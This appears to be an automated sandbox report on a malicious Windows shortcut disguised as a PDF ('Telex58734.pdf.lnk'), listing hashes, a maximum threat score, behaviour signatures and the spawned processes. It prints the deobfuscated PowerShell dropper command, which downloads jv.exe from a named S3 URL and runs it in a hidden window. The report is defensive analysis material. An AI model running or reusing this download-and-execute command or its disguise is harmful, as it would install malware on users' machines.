Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
29-05-2024 17:06
General
-
Target
Telex58734.pdf.lnk
-
Size
1KB
-
MD5
ee0e01d5cde42c26bba7e8b06380c146
-
SHA1
042c5bf844185917bd38d86b88640656b8710c2b
-
SHA256
b137bcb29d0d26422581e4e556bc1f9f29096d21de865c7d1a3e945434edd07f
-
SHA512
2af9903fb458549dab35e290229d62a68f692dacb3515d66e092b86bc24e8e4c4e79c80ab6d0df42a0e11365f27ece414acc04f4932f23dd588ce89e89f98831
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://compliancekyc.s3.eu-west-1.amazonaws.com/jv.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Telex58734.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$wc=New-Object Net.WebClient; $wc.DownloadFile('https://compliancekyc.s3.eu-west-1.amazonaws.com/jv.exe', 'C:\Users\Admin\AppData\Roaming\jv.exe'); Start-Process -WindowStyle Hidden 'C:\Users\Admin\AppData\Roaming\jv.exe'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB